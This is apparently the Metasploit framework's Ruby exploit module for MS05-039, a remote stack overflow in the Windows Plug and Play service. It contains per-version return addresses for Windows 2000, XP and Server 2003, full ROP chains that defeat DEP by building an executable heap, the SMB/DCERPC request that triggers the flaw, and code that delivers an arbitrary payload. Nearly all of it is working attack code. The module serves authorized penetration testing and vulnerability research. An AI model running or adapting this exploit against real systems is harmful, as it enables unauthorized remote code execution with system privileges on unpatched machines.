## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client def initialize(info = {}) super(update_info(info, 'Name' => 'MS05-039 Microsoft Plug and Play Service Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the Windows Plug and Play service. This vulnerability can be exploited on Windows 2000 without a valid user account. NOTE: Since the PnP service runs inside the service.exe process, a failed exploit attempt will cause the system to automatically reboot. }, 'Author' => [ 'hdm', 'cazz' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2005-1983' ], [ 'OSVDB', '18605' ], [ 'BID', '14513' ], [ 'MSB', 'MS05-039' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 SP0-SP4', # Tested OK - 11/25/2005 hdm { 'Ret' => 0x767a38f6, # umpnpmgr.dll }, ], [ 'Windows 2000 SP4 French', { 'Ret' => 0x767438f6, # French target by ExaProbe }, ], [ 'Windows 2000 SP4 Spanish', { 'Ret' => 0x767738f6, # umpnpmgr.dll }, ], [ 'Windows 2000 SP4 English/French/German/Dutch', { 'Ret' => 0x01013C79, # [Pita] [Houmous] }, ], [ 'Windows 2000 SP0-SP4 German', { 'Ret' => 0x767338f6, # German target by Michael Thumann }, ], [ 'Windows 2000 SP0-SP4 Italian', { 'Ret' => 0x7677366f, # acaro }, ], [ 'Windows XP SP1 English', { 'Ret' => 0x758c572a, # pop edi / pop ebx / ret in umpnpmgr.dll v5.1.2600.1106 'Pipe' => 'ntsvcs', 'Offset' => 16, } ], # NOTE: XP SP2, Server 2003 (and SP1) require an Administrator account to access # the vulnerable functionality. [ 'Windows XP SP2 English (Requires Admin)', # SafeSEH enabled, DEP AlwaysOn { #'Ret' => 0x41424344, 'Ret' => 0x758d2bb3, # pop eax / ret 0x8 'Pipe' => 'ntsvcs', 'PtrToZero' => 0x758c0170, # PE data of umpnpmgr.dll v5.1.2600.2180 'Offset' => 72, 'EspOffset' => 108, 'RopStack' => # All addresses are from umpnpmgr.dll v5.2.3790.1830 [ # # Step 1. Allocate an executable heap with HeapCreate # # Resolve HeapCreate from import 0x758c1148, # pointer to HeapCreate import 0x758c2950, # mov eax, [eax] / pop ebp / ret 0x8 0x41414141, # scratch 0x41414141, # scratch #0x758da008, # becomes ebp (something writable) 0x758da1c8-0xc, # becomes ebp (writable, used later) # Call HeapCreate 0x758cb728, # call eax / mov [ebp+0xc],eax / jmp... / mov eax,[ebp+0xc] / pop edi,esi,ebx,ebp / ret 0xc 0x41414141, # scratch 0x41414141, # scratch 0x01040110, # flOptions (gets & with 0x40005) 0x01010101, 0x01010101, 0x758ce552, # becomes edi - pop edi,esi / ret 0x758cdd7e, # becomes esi - pop esi,ebx,ebp / ret 0x4 0x41414141, # becomes ebx 0x41414141, # becomes ebp # Don't bother calling HeapAlloc, just add 0x8000 to the Heap Base 0x758d45f3, # or eax,0x8000 / pop ebp / ret 0x4 0x41414141, # scratch 0x41414141, # scratch 0x41414141, # scratch 0x41414141, # becomes ebp # save eax to ebx 0x758ce0d5, # push eax / call esi 0x41414141, # scratch 0x758da008+0x18, # becomes ebp # Setup eax to load our saved stack pointer 0x758d18db, # pop eax / ret 0xc 0x41414141, # scratch 0x758c524e, # becomes eax - pop ebp / ret 0x8 #0x758c2423, # becomes eax - pop esi,ebp / ret 0x8 # Store a pointer to the stack to a known address (ebp-0x18), flows to eax after 0x758c1281, # mov [ebp-0x18],esp / push eax / mov eax,[ebp-4] / mov [ebp-4],0xffffffff / mov [ebp-8],eax / lea eax,[ebp-0x10] / mov fs:[0],eax / ret 0x41414141, # scratch 0x41414141, # scratch 0x41414141, # scratch #0xcafebabe, # becomes esi 0x758da008-0x10, # becomes ebp # Call lstrcpyW to copy shellcode into executable heap 0x758c542e, # push [ebp+0x10] / push ebx / call lstrcpyW / push ebx / call edi 0x41414141, # scratch 0x41414141, # scratch # Skip the junk 0x758c96f6, # add al,0x3b / ret # Call the executable segment! 0x758c3b62 # call eax ] } ], [ 'Windows Server 2003 SP0 English (Requires Admin)', # SafeSEH unsupported, DEP unsupported { 'Ret' => 0x780df756, # push esp / ret in msvcp60.dll 'Pipe' => 'ntsvcs', 'PtrToZero' => 0x757702c0, # PE data of umpnpmgr.dll 'Offset' => 72, } ], [ 'Windows Server 2003 SP1 English (Requires Admin)', # SafeSEH enabled, DEP AlwaysOn { 'Pipe' => 'ntsvcs', # We will need to bypass DEP! #'Ret' => 0x41424344, 'Ret' => 0x757873d5, # pop eax / ret 0x4 'PtrToZero' => 0x757702c0, # PE data of umpnpmgr.dll 'Offset' => 72, # offset to saved eip 'EspOffset' => 108, # Offset to where esp ends up pointing 'RopStack' => # NOTE: 0x41414141 will become random data # All addresses are from umpnpmgr.dll v5.2.3790.1830 [ # # Step 1. Allocate an executable heap with HeapCreate # # Resolve HeapCreate from import 0x75771144, # pointer to HeapCreate import 0x75772e68, # mov eax, [eax] / pop ebp / ret 0x41414141, # scratch 0x41414141, # becomes ebp # Call HeapCreate 0x7578bc37, # jmp eax 0x41414141, # scratch 0x41414141, # scratch # Save the new heap address in edi 0x757791d5, # xchg eax,edi / cmp bh,0xff / ret 0x10 0x01040110, # flOptions (gets & with 0x40005) 0x01010101, 0x01010101, # # Step 2. Allocate a buffer using this new heap. # 0x757873d5, # pop eax / ret 0x4 0x41414141, # scratch 0x41414141, # scratch 0x41414141, # scratch 0x41414141, # scratch # Resolve HeapAlloc from import 0x7577115c, # pointer to HeapAlloc import 0x75772e68, # mov eax, [eax] / pop ebp / ret 0x41414141, # scratch 0x41414141, # becomes ebp # Save the address of HeapAlloc in esi 0x75777ae0, # xchg eax,esi / mov dl,0xff / dec ecx / ret 0x41414141, # scratch 0x41414141, # scratch # Call HeapAlloc 0x7578bb6b, # push edi / call esi / pop edi,esi,ebp / ret 0xffffffff, # flags 0x00010001, # allocation size 0x0101018d, # becomes edi / first byte stored 0x7577835c, # becomes esi - pop esi / pop ebx / ret 0x757830c3, # becomes ebp/eip - pop esi / ret # # Step 3. Save the heap address into ebx # 0x7578308f, # push eax / mov [0x7578d8e0],edi / mov [0x7578d39c],edi / call esi 0x41414141, # scratch # Put heap address in edi 0x757791d5, # xchg eax,edi / cmp bh,0xff / ret 0x10 # # Step 4. Write stub: # # metasm > lea esi,[esp+4]; _start: lodsb; test al,al; jz _out; stosb; _end: jmp _start; _out: # "\x8d\x74\x24\x04\xac\x84\xc0\x74\x03\xaa\xeb\xf8" # # Store the first byte. 0x7578be14, # stosb / ret 0x41414141, # scratch 0x41414141, # scratch 0x41414141, # scratch 0x41414141, # scratch # Store another byte! 0x757873d5, # pop eax / ret 0x4 0x01010174, # next byte to write 0x7578be14, # stosb / ret 0x41414141, # scratch # Store another byte! 0x757873d5, # pop eax / ret 0x4 0x01010124, # next byte to write 0x7578be14, # stosb / ret 0x41414141, # scratch # Store another byte! 0x757873d5, # pop eax / ret 0x4 0x01010104, # next byte to write 0x7578be14, # stosb / ret 0x41414141, # scratch # Store another byte! 0x757873d5, # pop eax / ret 0x4 0x010101ac, # next byte to write 0x7578be14, # stosb / ret 0x41414141, # scratch # Store another byte! 0x757873d5, # pop eax / ret 0x4 0x01010184, # next byte to write 0x7578be14, # stosb / ret 0x41414141, # scratch # Store another byte! 0x757873d5, # pop eax / ret 0x4 0x010101c0, # next byte to write 0x7578be14, # stosb / ret 0x41414141, # scratch # Store another byte! 0x757873d5, # pop eax / ret 0x4 0x01010174, # next byte to write 0x7578be14, # stosb / ret 0x41414141, # scratch # Store another byte! 0x757873d5, # pop eax / ret 0x4 0x01010103, # next byte to write 0x7578be14, # stosb / ret 0x41414141, # scratch # Store another byte! 0x757873d5, # pop eax / ret 0x4 0x010101aa, # next byte to write 0x7578be14, # stosb / ret 0x41414141, # scratch # Store another byte! 0x757873d5, # pop eax / ret 0x4 0x010101eb, # next byte to write 0x7578be14, # stosb / ret 0x41414141, # scratch # Store another byte! 0x757873d5, # pop eax / ret 0x4 0x010101f8, # next byte to write 0x7578be14, # stosb / ret 0x41414141, # scratch # # Step 5. Finally, call our executable heap buffer. # 0x75783efe # call ebx ] } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 9 2005')) register_options( [ OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']), ], self.class) end def pnp_probe(req, pipe = datastore['SMBPIPE']) print_status("Connecting to the SMB service...") begin connect() smb_login() rescue ::Exception => e print_error("Error: #{e.class} #{e}") end handle = dcerpc_handle('8d9f4e40-a03d-11ce-8f69-08003e30051b', '1.0', 'ncacn_np', ["\\#{pipe}"]) print_status("Binding to #{handle} ...") dcerpc_bind(handle) print_status("Bound to #{handle} ...") # CS_DES cs_des = NDR.long(0) + # CSD_SignatureLength NDR.long(0) + # CSD_LegacyDataOffset NDR.long(req.length) + # CSD_LegacyDataSize NDR.long(0) + # CSD_Flags rand_text(16) + # GUID req # CSD_LegacyData # PNP_QueryResConfList(L"a\\b\\c", 0xffff, (char *)pClassResource, 1000, foo, 4, 0); # ResourceName: stubdata = NDR.UnicodeConformantVaryingString("a\\b\\c") + # ResourceName, passes both IsLegalDeviceId and IsRootDeviceID NDR.long(0xffff) + # ResourceID: ResType_ClassSpecific NDR.UniConformantArray(cs_des) + # Resource (our CS_DES structure) NDR.long(cs_des.length) + # ResourceLen NDR.long(4) + # OutputLen (at least 4) NDR.long(0) # Flags print_status("Calling the vulnerable function...") begin dcerpc.call(0x36, stubdata) rescue Rex::Proto::DCERPC::Exceptions::NoResponse print_status('Server did not respond, this is expected') rescue => e if e.to_s =~ /STATUS_PIPE_DISCONNECTED/ print_status('Server disconnected, this is expected') else raise e end end # Cleanup disconnect if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil and dcerpc.last_response.stub_data == "\x04\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00") return true else return false end end def check if (pnp_probe('A')) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit # If PtrToZero is set, we use saved-ret-overwrite instead of SEH. if target['PtrToZero'] then eip_off = target['Offset'] nul_off = eip_off + 8 # DEP Bypass version (2003 SP1) if target['RopStack'] esp_off = target['EspOffset'] # Start with a randomized base buffer rop_length = target['RopStack'].length * 4 print_status("ROP Data is %u bytes" % rop_length) buf = rand_text(esp_off + rop_length) # Put the rest of the stack data at where esp ends up... target['RopStack'].each_with_index { |el,idx| if el != 0x41414141 buf[esp_off + (idx*4), 4] = [el].pack('V') end } else # Start with a randomized base buffer buf = rand_text(nul_off) end # This becomes EIP buf[eip_off,4] = [target.ret].pack('V') # Pointer to NULL (4 zero bytes) buf[nul_off,4] = [target['PtrToZero']].pack('V') else # Pad the string up to reach our SEH frame buf = rand_text(target['Offset'] ? target['Offset'] : 56) # Jump over the address and our invalid pointer to the payload buf << Rex::Arch::X86.jmp_short('$+32') buf << rand_text(2) # The SEH handler pointer buf << [target.ret].pack('V') # Some padding to reach the next pointer buf << rand_text(20) # ResourceName - cause access violation on RtlInitUnicodeString buf << rand_text(3) + "\xff" end # Append the encoded payload and we are good to go! buf << payload.encoded # Determine which pipe to use pipe = target['Pipe'] ? target['Pipe'] : datastore['SMBPIPE'] pnp_probe(buf, pipe) print_status('The server should have executed our payload') handler end end